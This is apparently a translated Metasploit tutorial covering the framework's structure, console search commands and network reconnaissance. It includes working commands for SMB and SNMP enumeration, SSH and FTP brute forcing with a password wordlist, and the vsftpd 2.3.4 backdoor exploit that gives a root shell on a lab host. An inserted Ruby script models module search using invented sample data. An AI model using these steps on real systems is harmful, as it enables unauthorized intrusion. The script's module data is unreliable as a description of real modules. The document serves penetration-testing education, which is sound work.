Metasploit penetration testing framework (1)

Contents

1. Introduction to Metasploit Penetration Testing Framework

1. Metasploit framework

2. Metasploit directory structure

2. Basic usage of Metasploit

1. The connect command in the core command

2. How to use module-related commands show

3. How to use the module-related command search search

4. How to use the module-related command use

5. How to use the module-related command info

3. Information collection for Metasploit penetration testing

1. Collect host information based on tcp protocol

(1) Use nmap and arp_sweep in Metasploit to collect host information

(2) Use semi-connection mode to scan TCP port

2. Collect host information based on SNMP protocol

3. Collect information based on SMB protocol

(1) Use smb_version to scan the version number based on the SMB protocol

(2) Use smb_enumshares to scan shared files (account, password) based on SMB protocol

(3) Use smb_lookupsid to scan system user information (SID enumeration)

4. Collect information based on SSH protocol

(1) View the version information of the ssh service

(2) Brute force cracking of SSH

5. Collect information based on FTP protocol

(1) View the version information of the ftp service

(2) FTP anonymous login scan

(3) FTP brute force cracking


1. Introduction to Metasploit Penetration Testing Framework

1. Metasploit system framework

1. Basic library: the Metasploit basic library files are located in the lib directory under the root of the source tree and consist of three parts: Rex, framework-core and framework-base.

Rex is the most basic component that the whole framework depends on. It provides wrapped network sockets, client and server implementations of network application protocols, the logging subsystem, exploitation support routines, PostgreSQL and MySQL database support, and so on.

The framework-core library implements all the interfaces through which the various types of upper-level modules and plug-ins interact with the framework.

The framework-base library extends framework-core: it provides simpler wrapper routines and support for handling various aspects of the framework, and offers functional classes that let the user interfaces and utility programs call the framework's own functions and integrated modules.

2. Modules: the modules are divided into six types according to their purpose: auxiliary modules (Aux), exploit modules (Exploits), post-exploitation modules (Post), payload modules (Payloads), encoder modules (Encoders) and NOP modules (Nops).

Note: a payload, also known as the attack payload, is mainly used to establish a stable connection between the target machine and the attacking machine. It can return a shell and perform program injection.

3. Plug-ins: Plug-ins can extend the functions of the framework, or assemble components with existing functions to form advanced features. Plug-ins can integrate some existing external security tools, such as Nessus, OpenVAS vulnerability scanner, etc., to provide some new functions for the user interface.

4. Interfaces: these include the msfconsole console, the msfcli command line, the msfgui graphical interface, the Armitage graphical interface and the msfapi remote call interface.

5. Utility programs: Metasploit also provides a series of utility programs that can be run directly, so that penetration testers and security staff can quickly use the internal capabilities of the framework to complete specific tasks. For example, msfpayload, msfencode and msfvenom can wrap a payload into executable files, C code, JavaScript and other forms, and can apply various kinds of encoding.

2. Metasploit directory structure

Change to the Metasploit working directory; it contains the following directories:

data: Editable files used by Metasploit

documentation: Provides documentation for the framework

lib: framework code library

modules: the actual MSF modules

plugins: Plugins that can be loaded at runtime

scripts: Meterpreter and other scripts

tools: various useful command-line tools

2. Basic usage of Metasploit

Metasploit Basic Commands

The Metasploit program requires a PostgreSQL database.

PostgreSQL overview:

PostgreSQL is a free-software object-relational database management system (ORDBMS) with very complete features. It is based on POSTGRES version 4.2, developed by the computer science department of the University of California, Berkeley.

Extension: differences in application scenarios between PostgreSQL and MySQL:

In terms of application scenarios, PostgreSQL is better suited to strict enterprise scenarios (such as finance, telecommunications, ERP and CRM), while MySQL is better suited to Internet scenarios with relatively simple business logic and lower data reliability requirements.

Start the database manually

┌──(rootkali)-[~]
└─# systemctl start postgresql

┌──(rootkali)-[~]
└─# systemctl enable postgresql
Synchronizing state of postgresql.service with SysV service script with /lib/systemd/systemd-sysv-install.
Executing: /lib/systemd/systemd-sysv-install enable postgresql
Created symlink /etc/systemd/system/multi-user.target.wants/postgresql.service → /lib/systemd/system/postgresql.service.

There are two ways to start Metasploit.

The first is to click the icon.

The second is to use the terminal command:

└─# msfdb run

After startup completes, some statistics are printed, such as the version number and how many exploits, payloads, etc. are available.

msf6 > help #View help information.

Note: running help gives an overall picture of msf. You can see that msf commands are divided into the following groups:

Core Commands #core command

Module Commands #module command

Job Commands #background task command

Resource Script Commands #Resource script command

Database Backend Commands #Database backend command

Credentials Backend Commands #credential backend commands

Developer Commands #Developer Commands

The commonly used commands are explained below.

1. The connect command in the core commands

The connect command is mainly used to connect to a remote host, and is generally used in intranet penetration. A common form is “connect 192.168.1.1 80”, where 192.168.1.1 is the IP address and 80 is the port number.

2. How to use the module command show

The show command is used a lot.

Valid parameters for the show command are: all, encoders, nops, exploits, payloads, auxiliary, post, plugins, info, options.

Example 1: List all exploit modules in the Metasploit framework.

msf6 > show exploits #List all exploit modules in the framework. This command outputs a lot of data and takes more time.

msf6 > show payloads #List all payloads in the framework.

msf6 > show auxiliary #List all auxiliary modules in the framework.

3. How to use the module command search

When you use msfconsole you will use many vulnerability modules, plug-ins and so on, so the search command is very important.

Typing search -h lists the options of the search command.

msf6 > search -h

Usage: search [ options ] <keywords> #options and keywords are added after search

Example 1: Search by name keyword

Here the name: keyword is used.

msf6 > search mysql # The search term directly follows search; this kind of search is very broad. Use this method only when you know the vulnerability name clearly.

Example: first find the ms08_067 vulnerability module you want.

msf6 > search ms08_067

Syntax: search <keyword>:<value>

For example, msf6 > search name:mysql # find modules related to the mysql database

Each exploit module is marked with a Rank field based on its potential impact on the target system.

Users can search, classify and sort exploit modules based on Rank.

Ranks in descending order of reliability:

excellent: The exploit will never crash the target service; for example SQL injection, command execution, remote file inclusion, local file inclusion and so on. Typical memory corruption exploits cannot be rated at this level unless there are special circumstances.

great: The exploit has a default target and can automatically detect the appropriate target, or can use a specific return address after a version check of the service.

good: The exploit has a default target and that target is the “common case” for this type of software (Windows 7, Server 2012, etc.).

normal: The exploit is reliable but version-specific, and the version cannot be, or cannot reliably be, auto-detected.

average: The exploit is unreliable or difficult to exploit.

low: The exploit is nearly impossible (or less than 50% successful) on common platforms.

manual: The exploit is unstable or difficult to exploit and is essentially denial of service (DoS) based. A module is also rated at this level when it is only useful if the user specially configures it; otherwise it is not used.

Example 2: Find by path

Sometimes we only remember the path of a module but forget its name. The path: keyword then finds all modules under that path. To list all mysql modules under the mysql path, enter:

msf6 > search path:mysql

Example 3: Narrowing your query

Keyword: platform

Function: modules affecting this platform, i.e. list the modules that can affect the given platform, which are the more usable vulnerabilities.

Sometimes a search returns a large number of modules; the platform: keyword narrows the scope of the query. After using platform:, the query results list the modules with higher rank. To find mysql vulnerabilities, enter:

msf6 > search platform:mysql

Example 4: Find by type

The type: keyword is used here.

type: specific type of module (exploit, payload, auxiliary, encoder, evasion, post, or nop)

To search for exploit modules, type:

msf6 > search type:exploit

Example 5: Combined lookup

The keywords above can be combined as needed. To find exploit modules related to mysql, type:

msf6 > search name:mysql type:exploit
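To make the search keywords from Examples 1 to 5 and the Rank ordering above concrete, the following Ruby script (an added example, not Metasploit's own code) models how name:, path:, platform: and type: filters narrow a module list and how rank orders the results. The module records are constructed sample metadata; mysql_overflow is a hypothetical module name, and the ranks and short names shown are illustrative, not the real modules' values.

```ruby
# Rank names in the order the page lists them (lowest first); Metasploit gives
# each a numeric value (manual = 0 up to excellent = 600) so results can be sorted.
RANKS = %w[manual low average normal good great excellent]
        .each_with_index.map { |name, i| [name, i * 100] }.to_h.freeze

# Constructed sample metadata: ranks and short names are illustrative, not the
# real modules' values; fullname is "type/path" as msfconsole displays it.
MODULES = [
  { fullname: "exploit/windows/smb/ms08_067_netapi",   name: "MS08-067 NetAPI",         platform: "windows", rank: "great" },
  { fullname: "exploit/unix/ftp/vsftpd_234_backdoor",  name: "VSFTPD 2.3.4 Backdoor",   platform: "unix",    rank: "excellent" },
  { fullname: "auxiliary/scanner/mysql/mysql_version", name: "MySQL Version Scanner",   platform: "",        rank: "normal" },
  { fullname: "exploit/linux/mysql/mysql_overflow",    name: "MySQL Overflow (sample)", platform: "linux",   rank: "average" },
  { fullname: "auxiliary/scanner/snmp/snmp_enum",      name: "SNMP Enumeration",        platform: "",        rank: "normal" },
].freeze

# Split "name:mysql type:exploit" into [keyword, value] filters. A bare word with
# no colon is a free-text term, matched against name and fullname like "search mysql".
def parse_query(query)
  query.split.map do |tok|
    key, value = tok.split(":", 2)
    value ? [key.downcase, value.downcase] : ["text", key.downcase]
  end
end

# One keyword filter applied to one module record.
def matches?(mod, key, value)
  fullname = mod[:fullname].downcase
  case key
  when "text", "name" then fullname.include?(value) || mod[:name].downcase.include?(value)
  when "path"         then fullname.include?(value)
  when "type"         then fullname.split("/", 2).first == value
  when "platform"     then mod[:platform].downcase == value
  else false # an unsupported keyword matches nothing
  end
end

# All filters must match (they are AND-ed, as in Example 5). Results are ordered
# highest rank first, then by fullname, so the most reliable module is listed first.
def search(query, modules = MODULES)
  filters = parse_query(query)
  modules.select { |m| filters.all? { |k, v| matches?(m, k, v) } }
         .sort_by { |m| [-RANKS.fetch(m[:rank]), m[:fullname]] }
         .map { |m| m[:fullname] }
end

puts search("name:mysql type:exploit") # prints exploit/linux/mysql/mysql_overflow
```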

4. How to use the module command use

use: to use a module, run the use command.

Syntax: use <module name>

5. How to use the module command info

info: displays information about a module.

Method 1: info <module name>

In the output, the things to focus on are:

(1) Available targets: which operating systems can be attacked

(2) Basic options: the parameters needed to run the module

(3) Vulnerability description and execution process

(4) References

Method 2: Use the show command to view information about the module

msf6 exploit(windows/smb/ms08_067_netapi) > show options #View module options

msf6 exploit(windows/smb/ms08_067_netapi) > show targets #Check which operating systems can be attacked

Set the RHOSTS parameter to specify the target machine of the attack

msf6 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 192.168.1.109

msf6 exploit(windows/smb/ms08_067_netapi) > show options #View the set value

After the configuration is complete, we can execute the module by typing exploit or run.

msf6 exploit(windows/smb/ms08_067_netapi) > back #Use back to exit the loaded module

Note: Do not use exit, exit will directly exit the Metasploit program

3. Information collection for Metasploit penetration testing

1. Collect host information based on tcp protocol

(1) Use nmap and arp_sweep in Metasploit to collect host information

The Nmap tool is also available from within Metasploit.

ARP scanning

msf6 > use auxiliary/scanner/discovery/arp_sweep

Check which parameters the module needs to configure

msf6 auxiliary(scanner/discovery/arp_sweep) > show options

Configure RHOSTS (target network for scanning)

msf6 auxiliary(scanner/discovery/arp_sweep) > set RHOSTS 192.168.1.0/24

SHOST and SMAC are used to spoof source IP and MAC addresses.

Configure the number of threads

msf6 auxiliary(scanner/discovery/arp_sweep) > set THREADS 30

msf6 auxiliary(scanner/discovery/arp_sweep) > run

msf6 auxiliary(scanner/discovery/arp_sweep) > back #Exit the module

(2) Use half-open (SYN) mode to scan TCP ports

msf6 > search portscan

2. Collect host information based on SNMP protocol

Simple Network Management Protocol (SNMP) is a set of network management standards consisting of an application layer protocol, a database schema and a set of resource objects. The protocol lets network management systems monitor devices connected to the network for any conditions that warrant administrative attention.

Hands-on: use the snmp_enum module to scan target server information over SNMP

msf6 > use auxiliary/scanner/snmp/snmp_enum

msf6 auxiliary(scanner/snmp/snmp_enum) > show options

msf6 auxiliary(scanner/snmp/snmp_enum) > set RHOSTS 192.168.1.180

msf6 auxiliary(scanner/snmp/snmp_enum) > run

Note: a lot of information is detected through the SNMP protocol, such as the server's hardware information and the processes currently running on it; these two kinds of information cannot be obtained by the other scanning methods.

3. Collect information based on SMB protocol

SMB overview: Server Message Block (SMB), also known as Common Internet File System (CIFS), is an application-layer network transport protocol developed by Microsoft. Its main function is to let machines on a network share resources such as files, printers, serial ports and communications.

Reimplemented by Unix server vendors, it can also connect Unix servers and Windows clients for tasks such as printing and file sharing.

(1) Use smb_version to scan version number based on SMB protocol

msf6 > use auxiliary/scanner/smb/smb_version

Note: the operating system version can be scanned, and the detected version number is very accurate.

(2) Use smb_enumshares to scan shared files (account, password) based on SMB protocol

A user name and password can be configured in most SMB modules, and the scan results of modules that have credentials configured will better meet our needs.

Enumerate Shares

msf6 > use auxiliary/scanner/smb/smb_enumshares

You can see that one is the xuegod shared file directory we set earlier and the other four are hidden shared directories.

(3) Use smb_lookupsid to scan system user information (SID enumeration)

msf6 > use auxiliary/scanner/smb/smb_lookupsid

4. Collect information based on SSH protocol

(1) View the version information of the ssh service

msf6 > use auxiliary/scanner/ssh/ssh_version

(2) Brute force SSH

msf6 > use auxiliary/scanner/ssh/ssh_login

msf6 auxiliary(scanner/ssh/ssh_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

5. Collect information based on FTP protocol

(1) View version information of ftp service

Load the ftp service version scanning module

msf6 > use auxiliary/scanner/ftp/ftp_version

The scan result is: vsFTPd 2.3.4

msf6 auxiliary(scanner/ftp/ftp_version) > back

Having obtained the version number of the ftp service, we can search for that version number to see if there are any usable modules.

msf6 > search 2.3.4

We found an exploit module for a backdoor in this version of the ftp service.

Let's try this module:

msf6 > use exploit/unix/ftp/vsftpd_234_backdoor

We got a shell, and it has root privileges. We try executing the following command:

Execute the id command to view the current user.

(2) ftp anonymous login scan

msf6 > use auxiliary/scanner/ftp/anonymous

(3) FTP brute force cracking

msf6 > use auxiliary/scanner/ftp/ftp_login

msf6 auxiliary(scanner/ftp/ftp_login) > set USERPASS_FILE /usr/share/metasploit-framework/data/wordlists/root_userpass.txt

syntaxbug.com © 2021 All Rights Reserved.